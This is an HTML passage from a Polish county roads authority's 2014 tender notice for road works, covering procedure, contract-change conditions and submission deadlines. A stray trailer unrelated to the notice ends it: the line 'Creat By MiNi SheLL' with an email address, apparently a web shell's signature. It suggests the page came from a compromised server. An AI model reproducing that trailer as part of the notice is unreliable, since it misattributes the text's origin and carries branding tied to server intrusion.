<p style="margin: 0px; padding: 0px;">oferta, kosztorys ofertowy, dokumenty poświadczające o wykonaniu robót należycie oraz zgodnie z zasadami sztuki budowlanej i prawidłowym ukończeniu</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z ar.144 ust.1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, pod warunkiem przeprowadzenia jej zgodnie z poniższymi zapisami. 
1/ Zmiany mogą być zainicjowane poprzez złożenie pisemnego wniosku.
Może to być:
- wniosek Zamawiającego o dokonanie wskazanej zmiany,
- wniosek Zamawiającego, aby Wykonawca przedłożył propozycje zmiany,
- wniosek Wykonawcy,
Wniosek musi zawierać:
- opis zmiany,
- uzasadnienie zmiany,
- koszt zmiany oraz wpływ zmiany na wysokość wynagrodzenia,
- czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy,
Uzasadnienie zmiany powinno zawierać opis korzyści z tytułu dokonania zmiany dla Zamawiającego np. w zakresie terminu lub kosztów (budowy lub eksploatacji) lub poprawy parametrów technicznych sprawnościowych oraz opis skutków zmian.
2/ Zmiany mogą obejmować:
- zmiany ilości każdej pracy objętej umową,
- zmianę jakości i innych cech charakterystycznych którejkolwiek części pracy,
- zmianę poziomu, pozycji czy też wymiarów którejkolwiek części robót,
- rezygnacja z jakiejkolwiek pracy (jednak bez prawa zlecenia jej osobom trzecim),
- zmiany w kolejności i terminach wykonywania robót,
- zmiany nr konta bankowego,
3/ Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia Zamawiającego jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań: 
- przekazania terenu budowy,
- przekazania dokumentów budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych, innych dokumentów wymaganych przepisami ,do których Zamawiający był zobowiązany,
- przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczonej dokumentacji,
- zmiany terminu dokonania prób końcowych i wniosku o dokonanie prób dodatkowych,
-zmiany terminu dokonania odbiorów przewidzianych w umowie,
- jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się opisać Zamawiającemu lub innemu Wykonawcy, zatrudnionemu przez Zamawiającego na terenie budowy,
4/ Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub miało wpływ na wykonanie przedmiotu umowy w przypadku:
- zawieszenia robót przez Zamawiającego,
- wykopalisk uniemożliwiających wykonywanie robót,
- szczególnie niesprzyjających warunków atmosferycznych,
- zmiany dokumentacji projektowej dokonanych na wniosek Zamawiającego (lub Wykonawcy),
- siły wyższej,
Utrata prawa do przedłużenia terminu wykonania przedmiotu umowy.
Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy, jeżeli oraz w zakresie, w jakim uchybienie do Zamawiającego było spowodowane przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu przez Wykonawcę.
5/ Sposób obliczenia zmiany wynagrodzenia
Podstawę sporządzenia kosztorysu na roboty wynikające ze zmiany dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych  stanowi:
- dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót budowlanych,
- kosztorys ofertowy w części cen jednostkowych lub dane wyjściowe do kosztorysowania przyjęte do sporządzania kosztorysu ofertowego, ceny jednostkowe pracy sprzętu i materiałów, zaproponowanych przez Wykonawcę, ale nie większe niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót,
- kalkulacja szczegółowa w oparciu o uzgodnione z Zamawiającym publikacje jednostkowych nakładów rzeczowych (kalkulacja uproszczona sporządzona 
w oparciu o uzgodniony z Zamawiającym publikator cen jednostkowych robót budowlanych. 
Utrata prawa do zmiany wynagrodzenia.
Wykonawca nie będzie uprawniony do żadnej zmiany wynagrodzenia za wykonanie przedmiotu umowy  w zakresie, w jakim uchybienie do Zamawiającego było spowodowane przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu przez  Wykonawcę.
Pozostałe kwestie odnoszące się do umowy uregulowane są we wzorze umowy załączonym do Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp.nysa.pl lub http://bip.spnysa.nv.pl/Inne/Zarząd Dróg Powiatowych<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Nysie, 48-300 Nysa ul.Słowiańska 17 pokój nr 5 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2014 godzina 09:45, miejsce: Zarząd Dróg Powiatowych w Nysie, 48-300 Nysa ul.Słowiańska 17 pokój nr 3 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com